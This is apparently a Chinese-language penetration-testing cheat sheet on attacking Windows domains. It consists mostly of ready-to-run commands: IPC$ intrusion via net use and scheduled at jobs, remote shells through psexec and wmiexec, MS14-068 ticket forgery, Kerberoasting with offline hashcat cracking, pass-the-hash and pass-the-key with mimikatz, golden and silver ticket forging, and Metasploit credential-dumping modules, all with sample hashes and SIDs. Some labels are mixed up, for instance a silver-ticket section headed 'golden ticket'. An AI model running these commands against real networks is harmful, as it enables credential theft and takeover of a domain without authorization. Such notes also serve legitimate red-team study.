IPC MS14068 Pth Ptt Ptk Kerberoating

IPC

IPC$入侵

  • 建立非空连接

  • 新建批处理

  • Copy命令上传

  • 查看目标靶机时间

  • 通过at命令在特定时间执行批处理文件

  • 在目标靶机上查看

其他命令

  • 将目标共享建立一个映射g盘 net use g: \\192.168.3.68\c$

  • 查看已建立的会话

通过工具进行会话连接执行

1
psexec.exe  \\192.168.1.108   cmd  -uadministrator   -p  123456
1
csript.exe  wmiexec.vbs   /shell   192.168.1.108   administrator   123456

返回一个cmd交互界面执行即可

MS14068

  • 首先尝试访问域控共享文件夹 拒绝访问

  • 使用ms16048

-u 域账号+@+域名称 -p 为当前用户的密码,即 ts1 的密码 -s 为 ts1 的 SID 值,可以通过 whoami /all 来获取用户的 SID 值 -d 为当前域的域控

  • 生成ccache文件

  • 删除当前缓存的kerboeos票据 kerberos::purge

  • 导入ccache文件 kerberos::ptc

  • 再次访问域控共享文件

Kerberoating

早期kerberoating

工具 Kerberoast工具包 Mimikatz

  • 使用Kerberoast工具包GetUserPNs.ps1进行SPN扫描

  • 根据微软提供的类KerberosRequeststorSecurityToken发起Kerberos请求申请票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SRC_DB_ODAY.org:1433"

  • 通过klist命令查看当前会话存储的Kerberos票据 klist

  • 使用mimikatz导出 kerberos::list /export

  • 使用kerberoast 工具集中的 tgsrepcrack.py 工具进行离线爆破 python tgsrepcrack.py list1.txt 2-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi

kerberoating新姿势

工具 Invoke-Kerberoast.ps1 HashCat

  • 转为Hashcat格式 Invoke-kerberoast –outputformat hashcat | fl
  • 保存 nvoke-Kerberoast -Outputformat Hashcat | fl > test1.txt

  • Hashcat爆破 hashcat64.exe –m 13100 test1.txt password.list --force

Pth

Pass the hash

  • 使用mimikatz先获取hash

    1
    
    privilege::debug
    1
    
    sekurlsa::logonpasswords

  • 攻击机执行

    1
    
    mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:SRV-DB-0DAY /ntlm:ac307fdeab3e8307c3892c163a7808d5"

  • 验证pth

wmiexec

  • Invoke-SMBExec

    1
    2
    3
    
    https://github.com/Kevin-Robertson/Invoke-TheHash
    
    Invoke-WMIExec -Target 192.168.3.21 -Domain workgroup -Username administrator -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose
  • Invoke-SMBExec

    1
    
    Invoke-SMBExec -Target 192.168.3.21 -Domain test.local -Username test1 -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose

如果只有SMB文件共享的权限,没有远程执行权限,可以使用该脚本

  • wmiexec.py

    1
    2
    3
    
    https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
    
    https://github.com/maaaaz/impacket-examples-windows
    1
    
    wmiexec -hashes 00000000000000000000000000000000:ccef208c6485269c20db2cad21734fe7 workgroup/administrator@192.168.3.21 "whoami"

普通用户可用

CrackMapExec

1
https://github.com/byt3bl33d3r/CrackMapExec.git
1
crackmapexec 192.168.3.0/24 -u administrator -H ccef208c6485269c20db2cad21734fe7

Ptk

对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NT hash

  • 获取用户的aes key

    1
    
    mimikatz "privilege::debug" "sekurlsa::ekeys"

  • 注入aes key

    1
    
    mimikatz "privilege::debug" "sekurlsa::pth /user:sqlsvr /domain:0DAY.ORG /aes256:bf2cab4e27a426c9ec9d21c919f119843415ee5d98587063d6e48d16633c5436" 

Ptt

Golden ticket(黄金票据)

前提: 域名称 域SID krbtgt账户密码 伪造用户名

  • dump krbtgt hash

    1
    2
    
    privilege::debug
    lsadump::lsa /patch

  • 生成ticket

    1
    
    kerberos::golden  /admin:administrator  /domain:0day.org /sid: S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2  /ticket:test.kiribi

  • 注入凭据

    1
    
    kerberos::ptt test.kirbi

- 验证Golden ticket

golden ticket(白银票据)

前提: 域名称 域SID 域的服务账户的密码hash 伪造用户名

  • dump server hash

    1
    2
    
    privilege::debug
    sekurlsa::logonpasswords

  • 导入凭证

    1
    
    kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:192.168.3.142 /rc4:74cca677f85c7c566352fd846eb0d82a  /service:cifs /user:syst1m /ptt
  • 验证

Tips

1
mimikatz复制粘贴困难,可使用如>>log.txt
1
exploit/windows/smb/psexec 使用hash传递
1
post/windows/gather/smart_hashdump 读取hash
1
.domain_list_gen 获取域管理账户列表
1
auxiliary/gather/kerberos_enumusers 用户名枚举
1
auxiliary/admin/kerberos/ms14_068_kerberos_checksum 14068
1
2
3
load kiwi
kerberos_ticket_use /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi kiwi扩展来导入TGT票证
参考:https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit/
  • Mimikatz

    1
    2
    3
    4
    5
    6
    
    load mimikatz 加载
    mimikatz_command -f version  版本
    mimikatz_command -f fu 获取可用模块列表
    msv 检索msv凭证
    wdigest 读取密码
    kerberos 尝试检索kerberos凭据

看到了再加~